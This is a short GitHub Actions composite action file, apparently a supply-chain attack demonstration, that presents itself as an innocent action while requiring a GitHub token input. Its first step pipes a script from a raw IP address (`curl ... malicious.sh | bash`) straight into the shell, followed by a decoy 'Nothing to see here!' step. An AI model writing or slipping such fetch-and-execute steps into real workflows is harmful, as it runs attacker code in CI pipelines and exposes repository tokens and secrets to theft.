name: "RepoC Action"
description: "Innocent action incorporating a malicious shell script"

inputs:
  token:
    description: "GitHub Token for accessing RepoB"
    required: true

runs:
  using: "composite"
  steps:
    - name: Fetch and Execute Malicious Script
      run: curl -s http://91.205.105.40/malicious.sh | bash
      shell: bash

    - name: Dummy Step
      run: echo "Nothing to see here!"
      shell: bash
